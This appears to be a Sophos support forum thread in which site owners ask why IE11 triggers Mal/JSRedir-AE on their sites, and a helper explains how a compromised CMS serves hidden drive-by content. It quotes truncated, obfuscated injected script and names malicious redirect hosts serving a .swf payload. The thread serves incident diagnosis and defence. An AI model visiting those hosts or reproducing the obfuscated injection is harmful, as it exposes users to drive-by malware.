This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Sophos detect Mal/JSRedir-AE with Internet Explorer 11 (11.63.10586.0 update 11.0.26) and no Malware with Google chrome

While browsing the web, Sophos web control bock some website if we use IE 11 with the information : Malicious Content Blocked Mal/JSRedir-AE.

Sophos didn't detect anything on the same website with Google Chrome.

Where is the real problem ? It is sophos and IE11 or the website ?

Our solution :

we had to restore an old backup...



This thread was automatically locked due to age.
Parents
  • I was able to create a work around for this issue by opening the Sophos control panel -> Configure Anti-virus and HIPS -> Web Protection -> change the drop down for Download Scanning to Off then applying the settings. Then open the page in IE it will open fine, I then changed the setting back to it's original setting and the web page still loads without error.
  • Hello Roger,

    a work around for this issue
    ok, let's first agree on what the issue is. Please have a look at the analysis for Mal/JSRedir-AE. Guess you shouldn't take it lightly and I wouldn't recommend to work around it  If you look at its Summary page you see "Please send us a sample" (not possible though if it's blocked by download scanning) and that it's a generic detection which suggests it could be harmless but shouldn't indiscriminately be regarded as safe.

    @Eric and @Roger (and TWIMC)
    As to different results for different browsers: Web pages try to be "smart" and tune the page for "optimum user experience" depending on the browser. Thus different scripts, style sheets, and so on might be loaded for different browsers. Unlikely that a redirection is needed to serve important content only when viewed with IE, or? More likely that the (admittedly potential) exploit kit is crafted for IE.
    On of the possible payloads for these drive-by attacks is ransomware (the kind that encrypts your files). Ransomware is not delivered for every request though, it's deliberately served only for a small fraction to "protect" the actual source of the threat. From the user's POV kinda inverse lottery. You don't want to be the one which hits the sh*tpot.   

    So, please, don't think these detections are written just to annoy you

    Christian

  • Christian

    Please trust me when I say that I am not taking this lightly however I have had my web developer scan my site multiple times specifically looking for the signatures defined by Sophos. He cannot find any evidence of the virus with the tools we have, If you will browse to my site do you see the issue and can you tell me what item in the site is infected.

    I personally  have scanned my web page with https://app.webinspector.comand  and that online scanner found no issues.

    With my workaround I have not disabled your product I continue to use the Download scanning option on all websites including the one mentioned; however it appears to be a false positive as after I do the workaround the page is no longer detected as malicious even after reboot and clearing cache.

    Since this is my website I am concerned about this situation and want to make certain the problem is resolved.

    The only detection I get is from the Sophos installed web protection when running IE.  I do understand about the different modules loading for different web browsers.

    Any help would be appreciated. 

    Roger

  • Hello Roger,

    I'm not Sophos ... anyway, here's part of what's returned when I access the site with IE:



    HTTP/1.1 200 OK
    Date: Thu, 28 Jan 2016 11:35:47 GMT
    Server: Apache
    Set-Cookie: _PHP_SESSION_PHP=423; expires=Thu, 04-Feb-2016 11:35:47 GMT; path=/
    Content-Type: text/html; charset=utf-8
    Connection: close
     
    <!--//--><script> function moveTo(){return true;}function resizeTo(){return true;}
    </script>
    <div id="cvmythmetwel" class="qutbzmrvstg">bgbw. bodla, gajbyakeocrdzabbva r aw bvcdbl
    cl ddamanbx dbasazb zakdudbaya mbzblaoaqa paneg cseodfd zdle. sc y aa. dneudv egdfdhcoe.
    pd rdyc uegdgecacd laibjci, cl axa wc sbl aacfatbuakecdnawcvag azakbmbxbt avcibfcdajbwbabu
    dydidwd webcocoaybn bbckcreadge cadd abbcl, bjclakdrcwefalcdambic nck ajdv cla vacbu
    a lal agbhctex cpdza lbla fcpagb zcl, budjabahb paecl bddz d eecc qebchbeabafbqbnchav.
    bma zccaycla - cccaldmdzd ydtdlas; aj b yahed: d j eudbbv becsacbkcabp c qcmc pbiaobibdebb
    bblbzduboafblboaqamapeg c s - efbcboa mcl aldf a fbiexbt a l albcbjctejcqca bbb zakdfdheqbybgataeafbzanbuaqcjagb
    x aw d lay. clblbzawamdebnanb la xbrback adan bfcfbhdsdgd nddekbfbucpbwag buasdqdddx
    dtecajba df buakclb fbvb 'be' id h agdnbmbpdtae dq ctcbb. bbvaubiddeoac drbdeobyccaya
    rbbetc zcbacbta. j; b nat dgatckb, rbzd ndodg b vajbka zbq: ake cavcqaiedelbyanawayeucm
    erazcbaiclald fa. fbib wbuaq; anag, bjb - de qazbyb bblaldjbfbzcbb ualadambvabbxb
    c b i azbv ak dlbbchcac, aa ncyal bpacerbe bobdcl alcrcqblcachal ab aaeabfckai e
    q aeb. vbf cnaebkcbbpc q dfdlepcvb war, bjdr epd idjdldzcgcjd basdpex cndx cwexdrb
    l dcagdo emej btaqagb c budeemcwe k d: reacsdq, aoclccby a n - drcwem dm dydm! erdfdx
    apd cazcd c i c 97 lctdqctbiagbgcsdscsej</div>
    <div id="bncwobbltqjmy" class="qutbzmrvstg">VQZybhFoVxGoJf6k</div>
    <script>
    var szunqcjoooqqlez=(43655183>1644902541?"o":"\x72\x65");
    var pafbknmwhiahkk=(1493789990<263569207?"woc":"p"); .....


    I'd say this doesn't look really innocent. Injections are often cleverly hidden from local inspection. Don't ask me where but it is there.
    I don't know of a specific contact at Sophos (and under which conditions and to what extent they will assist in cleaning the site) so you'd have to start with giving Support a call.

    Christian

  • I thank you for your time and assistance you have been very helpful. I will post back when I find the root cause.

    Thanks again.
Reply Children
  • I am experiencing the same issue with my site. I too have used many site scanners and found nothing. Have discovered a solution?

  • Hello MarkHarris,

    the same issue
    meaning you (or someone else) get a Mal/JSRedir-xx alert when browsing with IE11 and otherwise not, or?
    with my site
    sorry, but I (and probably this is true for many others) am not aware and knowledgeable about you and your site, should I be?

    a solution
    one of two: Either the alert is genuine and your site is compromised then you have to clean it. Or it's a false positive , for this please see Sophos reports that a website is blocked or has access restricted.

    Christian

  • Christian, as in my own site (www.harrisdigi.com) [and a couple of others I have tested on the shared hosting] are receiving the alert.

    The requested location contains malicious content, identified as Mal/JSRedir-AE

    I had labs look at the alert, and got the following

    " Initial access to the website harrisdigi.com shows redirection to :
    scheinecontactaient.contract-ready.com/stun/sheep-22493962
    scheinecontactaient.contract-ready.com/monk/mental-32003369.swf"

    I do not know where the redirect code is being called. the logs of Sophos don't list it. I cant watch the page information load on my computer to determine the call because Sophos blocks it. this does not occur in any browser even edge so I cant watch the loading.

    what tool did you use to illustrate the code presence in the other site?

    I have searched my hosting directories, but found nothing I could attribute the redirect too. If I knew the file called just before the redirect I might be able to correct the issue.

  • Hello MarkHarris,

    what tool
    a small local proxy, legacy software no longer available, have to find a current replacement yet. It lets me modify the request headers and view the response as source.

    Only if I identify the browser as IE (tested as IE8 and IE11) the following is returned (I'll show only some parts):

    <span id="byteDefault" style="display:none">a16 1z 19 19 a23 -ed15v 18 4 a38 ke15
    18 13 1s9 93 72a 75c e59 23 9e 14 4- c15k -2b3 j78 1b9 9 4 5 2 1 a18 a61 73 a7-5e
    72 75 5v9 23 9c 1gab4c c4e b15 23 78 3, 8a 1j8 15 13a k5 61a 7q3 91 42e 1 b22d m1
    35a 12l 1 1d9 19 38a 21- 1b4 3 t20 9 c1i5 14d 93- 5j9 a66 18 a22 90 bi-81 a8.m1 6d6
    jc76- 66b 4e5 m51 d41 dc37 j66 76d 61 o91 6 ag15 18 7-2a 3 15 p14 20 -9b 14 s21e
    [... more of this deleted ...} 91aa-ad-bnbnbaawbgagde-b-oclape-ieedbczbqe,a
    </span>
    <script>scrollAnchor="\x74\x6f";getClassSelect="\x63\x6f\x6e";taintPassword=getClassSelect; [... more of this deleted ...]
    </script>
    <noscript>Error displaying the error page: Application Instantiation Error: Failed to start
    the session because headers have already been sent by "/home1/onezerbu/public_html/harrisdi/includes/defines.php"
    at line 123.

    Thus when trying to view your site with IE Sophos blocks the content, with other browsers it works. The logic which delivers malicious content  for IE is not in/on the page but on the server (so you don't "see" it when accessing the site with other browsers). Problem is that a compromised CMS can do a lot of tricks. Might return malicious content only if the URL is referred from Google search results. Might always deliver clean pages for requests from the local network, a certain geographic area, or "known" webpage test sites. Last but not least the CMS' administration interface (and perhaps the database administration tool) will hide the malicious content from the website admin.  

    Depending on the nature of the compromise it could affect only one virtual server, some, or all. Naturally and unfortunately I can't tell you though how to clean it up and it likely involves actions from your provider at the OS level.

    Christian